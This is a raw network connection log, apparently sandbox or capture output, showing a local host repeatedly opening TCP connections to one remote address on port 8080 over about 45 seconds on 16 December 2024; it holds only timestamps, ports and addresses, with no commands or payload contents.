Dec 16, 2024 12:18:55.612535954 CET	49754	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:55.612649918 CET	49755	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:55.612649918 CET	49755	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:55.732547045 CET	8080	49755	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:55.732592106 CET	8080	49755	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:56.860637903 CET	8080	49755	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:56.913307905 CET	49755	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:56.978236914 CET	49755	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:56.978949070 CET	49756	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:57.098877907 CET	8080	49755	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:57.098927975 CET	8080	49756	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:57.098978043 CET	49755	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:57.099035978 CET	49756	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:57.099179983 CET	49756	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:57.099179983 CET	49756	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:57.219108105 CET	8080	49756	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:57.219129086 CET	8080	49756	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:58.347475052 CET	8080	49756	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:58.397833109 CET	49756	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:58.463289976 CET	49756	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:58.464061022 CET	49757	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:58.584044933 CET	8080	49757	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:58.584270954 CET	49757	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:58.584530115 CET	49757	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:58.584564924 CET	49757	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:58.584990025 CET	8080	49756	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:58.585071087 CET	49756	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:58.704502106 CET	8080	49757	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:58.704524040 CET	8080	49757	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:59.869250059 CET	8080	49757	31.13.224.69	192.168.2.4
Dec 16, 2024 12:18:59.913489103 CET	49757	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:59.980101109 CET	49757	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:18:59.981064081 CET	49758	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:00.100723982 CET	8080	49757	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:00.100936890 CET	8080	49758	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:00.101007938 CET	49757	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:00.101080894 CET	49758	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:00.101306915 CET	49758	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:00.101344109 CET	49758	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:00.221246958 CET	8080	49758	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:00.221271992 CET	8080	49758	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:01.375282049 CET	8080	49758	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:01.429059982 CET	49758	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:01.493789911 CET	49758	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:01.494616032 CET	49760	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:01.614728928 CET	8080	49758	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:01.614831924 CET	8080	49760	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:01.615031958 CET	49760	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:01.615096092 CET	49758	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:01.615132093 CET	49760	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:01.615133047 CET	49760	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:01.735330105 CET	8080	49760	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:01.735452890 CET	8080	49760	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:03.469422102 CET	8080	49760	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:03.522702932 CET	49760	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:03.598319054 CET	49760	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:03.602103949 CET	49761	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:03.718687057 CET	8080	49760	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:03.718772888 CET	49760	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:03.722047091 CET	8080	49761	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:03.722151041 CET	49761	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:03.725904942 CET	49761	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:03.725944042 CET	49761	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:03.847950935 CET	8080	49761	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:03.847994089 CET	8080	49761	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:06.495816946 CET	8080	49761	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:06.538502932 CET	49761	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:06.603055954 CET	49761	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:06.603717089 CET	49773	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:06.724657059 CET	8080	49773	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:06.724737883 CET	49773	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:06.724852085 CET	8080	49761	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:06.724906921 CET	49761	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:06.724934101 CET	49773	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:06.724983931 CET	49773	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:06.844758987 CET	8080	49773	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:06.844795942 CET	8080	49773	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:07.976933956 CET	8080	49773	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:08.022905111 CET	49773	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:08.087862968 CET	49773	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:08.088362932 CET	49774	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:08.208631039 CET	8080	49774	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:08.208725929 CET	8080	49773	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:08.208817959 CET	49774	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:08.208868980 CET	49773	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:08.209032059 CET	49774	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:08.209096909 CET	49774	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:08.329257965 CET	8080	49774	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:08.329312086 CET	8080	49774	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:09.454586983 CET	8080	49774	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:09.507119894 CET	49774	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:09.572236061 CET	49774	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:09.572884083 CET	49780	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:09.692992926 CET	8080	49774	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:09.693051100 CET	8080	49780	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:09.693145037 CET	49780	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:09.693180084 CET	49774	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:09.693304062 CET	49780	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:09.693365097 CET	49780	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:09.813496113 CET	8080	49780	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:09.813540936 CET	8080	49780	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:10.974291086 CET	8080	49780	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:11.022739887 CET	49780	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:11.087672949 CET	49780	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:11.088393927 CET	49786	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:11.212604046 CET	8080	49786	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:11.212703943 CET	49786	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:11.212800026 CET	8080	49780	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:11.212865114 CET	49780	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:11.212908983 CET	49786	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:11.212937117 CET	49786	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:11.332655907 CET	8080	49786	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:11.332715034 CET	8080	49786	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:12.523499012 CET	8080	49786	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:12.569698095 CET	49786	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:12.636291027 CET	49786	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:12.637212038 CET	49787	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:12.757343054 CET	8080	49786	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:12.757499933 CET	8080	49787	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:12.757498026 CET	49786	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:12.757725954 CET	49787	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:12.757860899 CET	49787	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:12.757898092 CET	49787	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:12.877873898 CET	8080	49787	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:12.877919912 CET	8080	49787	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:14.004390001 CET	8080	49787	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:14.054166079 CET	49787	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:14.119349957 CET	49787	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:14.120141983 CET	49793	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:14.241156101 CET	8080	49787	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:14.241272926 CET	49787	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:14.241437912 CET	8080	49793	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:14.241528988 CET	49793	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:14.243379116 CET	49793	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:14.243415117 CET	49793	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:14.363586903 CET	8080	49793	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:14.363631964 CET	8080	49793	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:15.572176933 CET	8080	49793	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:15.616574049 CET	49793	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:15.682405949 CET	49793	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:15.683162928 CET	49799	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:15.803153038 CET	8080	49793	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:15.803181887 CET	8080	49799	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:15.803425074 CET	49799	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:15.803481102 CET	49793	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:15.803679943 CET	49799	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:15.803716898 CET	49799	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:15.924010992 CET	8080	49799	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:15.924063921 CET	8080	49799	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:17.071687937 CET	8080	49799	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:17.116619110 CET	49799	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:17.182447910 CET	49799	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:17.183437109 CET	49804	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:17.303329945 CET	8080	49799	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:17.303417921 CET	49799	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:17.303546906 CET	8080	49804	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:17.303630114 CET	49804	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:17.303875923 CET	49804	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:17.303929090 CET	49804	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:17.423537970 CET	8080	49804	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:17.423553944 CET	8080	49804	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:18.557284117 CET	8080	49804	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:18.600878000 CET	49804	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:18.666831017 CET	49804	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:18.667531967 CET	49806	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:18.787400007 CET	8080	49806	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:18.787507057 CET	49806	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:18.787631035 CET	8080	49804	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:18.787683010 CET	49804	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:18.787877083 CET	49806	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:18.787914038 CET	49806	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:18.907649040 CET	8080	49806	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:18.907690048 CET	8080	49806	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:20.463035107 CET	8080	49806	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:20.463202000 CET	8080	49806	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:20.463270903 CET	49806	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:20.572480917 CET	49806	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:20.573276997 CET	49812	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:20.692775011 CET	8080	49806	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:20.693063021 CET	49806	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:20.693233013 CET	8080	49812	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:20.693317890 CET	49812	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:20.693550110 CET	49812	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:20.693583965 CET	49812	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:20.814364910 CET	8080	49812	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:20.814421892 CET	8080	49812	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:22.024398088 CET	8080	49812	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:22.069827080 CET	49812	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:22.135358095 CET	49812	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:22.136256933 CET	49818	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:22.256331921 CET	8080	49812	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:22.256376982 CET	8080	49818	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:22.256406069 CET	49812	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:22.256486893 CET	49818	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:22.256730080 CET	49818	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:22.256769896 CET	49818	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:22.376802921 CET	8080	49818	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:22.376838923 CET	8080	49818	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:23.528111935 CET	8080	49818	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:23.569628000 CET	49818	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:23.637379885 CET	49818	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:23.638010025 CET	49821	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:23.757417917 CET	8080	49818	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:23.757508039 CET	49818	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:23.757729053 CET	8080	49821	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:23.757813931 CET	49821	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:23.757987022 CET	49821	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:23.758012056 CET	49821	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:23.877897024 CET	8080	49821	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:23.877928019 CET	8080	49821	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:25.000852108 CET	8080	49821	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:25.054126024 CET	49821	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:25.119617939 CET	49821	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:25.120265961 CET	49825	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:25.239779949 CET	8080	49821	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:25.239896059 CET	49821	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:25.240003109 CET	8080	49825	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:25.240086079 CET	49825	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:25.240271091 CET	49825	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:25.240309954 CET	49825	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:25.360053062 CET	8080	49825	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:25.360270023 CET	8080	49825	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:26.498600960 CET	8080	49825	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:26.554085970 CET	49825	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:26.603641033 CET	49825	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:26.604283094 CET	49831	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:26.724252939 CET	8080	49825	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:26.724345922 CET	8080	49831	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:26.724462986 CET	49831	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:26.724497080 CET	49825	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:26.724651098 CET	49831	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:26.724669933 CET	49831	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:26.844549894 CET	8080	49831	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:26.844594002 CET	8080	49831	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:27.987004042 CET	8080	49831	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:28.038409948 CET	49831	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:28.103750944 CET	49831	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:28.104671955 CET	49832	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:28.224117041 CET	8080	49831	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:28.224229097 CET	49831	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:28.224417925 CET	8080	49832	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:28.224541903 CET	49832	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:28.224751949 CET	49832	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:28.224788904 CET	49832	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:28.344574928 CET	8080	49832	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:28.344605923 CET	8080	49832	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:29.470256090 CET	8080	49832	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:29.522882938 CET	49832	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:29.592024088 CET	49832	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:29.592931986 CET	49838	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:29.712397099 CET	8080	49832	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:29.712503910 CET	49832	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:29.712902069 CET	8080	49838	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:29.713006020 CET	49838	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:29.713224888 CET	49838	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:29.713264942 CET	49838	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:29.833039999 CET	8080	49838	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:29.833118916 CET	8080	49838	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:30.980479956 CET	8080	49838	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:31.022849083 CET	49838	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:31.087841988 CET	49838	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:31.089824915 CET	49844	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:31.208482981 CET	8080	49838	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:31.209408045 CET	49838	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:31.209749937 CET	8080	49844	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:31.209934950 CET	49844	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:31.209961891 CET	49844	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:31.209975958 CET	49844	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:31.330081940 CET	8080	49844	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:31.330147028 CET	8080	49844	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:32.459955931 CET	8080	49844	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:32.507150888 CET	49844	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:32.572594881 CET	49844	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:32.573489904 CET	49845	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:32.693166018 CET	8080	49844	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:32.693243027 CET	49844	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:32.693540096 CET	8080	49845	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:32.693633080 CET	49845	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:32.695274115 CET	49845	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:32.695274115 CET	49845	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:32.815803051 CET	8080	49845	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:32.815841913 CET	8080	49845	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:33.964093924 CET	8080	49845	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:34.007153034 CET	49845	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:34.072426081 CET	49845	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:34.072961092 CET	49851	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:34.193351030 CET	8080	49845	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:34.193423986 CET	8080	49851	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:34.193588972 CET	49845	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:34.193780899 CET	49851	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:34.193780899 CET	49851	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:34.197758913 CET	49851	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:34.313584089 CET	8080	49851	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:34.317574978 CET	8080	49851	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:35.497426033 CET	8080	49851	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:35.538636923 CET	49851	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:35.603321075 CET	49851	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:35.603868961 CET	49857	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:35.723701954 CET	8080	49851	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:35.723745108 CET	8080	49857	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:35.723823071 CET	49851	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:35.723860025 CET	49857	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:35.724056959 CET	49857	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:35.724093914 CET	49857	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:35.843847990 CET	8080	49857	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:35.843904972 CET	8080	49857	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:37.048379898 CET	8080	49857	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:37.100929022 CET	49857	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:37.172569990 CET	49857	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:37.173562050 CET	49862	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:37.292650938 CET	8080	49857	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:37.292730093 CET	49857	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:37.293744087 CET	8080	49862	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:37.294127941 CET	49862	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:37.294127941 CET	49862	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:37.294127941 CET	49862	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:37.414077044 CET	8080	49862	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:37.414108992 CET	8080	49862	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:38.602039099 CET	8080	49862	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:38.647883892 CET	49862	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:38.713701010 CET	49862	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:38.714693069 CET	49864	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:38.834027052 CET	8080	49862	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:38.834300041 CET	49862	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:38.834485054 CET	8080	49864	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:38.834583044 CET	49864	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:38.834815979 CET	49864	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:38.834847927 CET	49864	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:38.955900908 CET	8080	49864	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:38.955970049 CET	8080	49864	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:40.110639095 CET	8080	49864	31.13.224.69	192.168.2.4
Dec 16, 2024 12:19:40.163567066 CET	49864	8080	192.168.2.4	31.13.224.69
Dec 16, 2024 12:19:40.229621887 CET	49864	8080	192.168.2.4	31.13.224.69
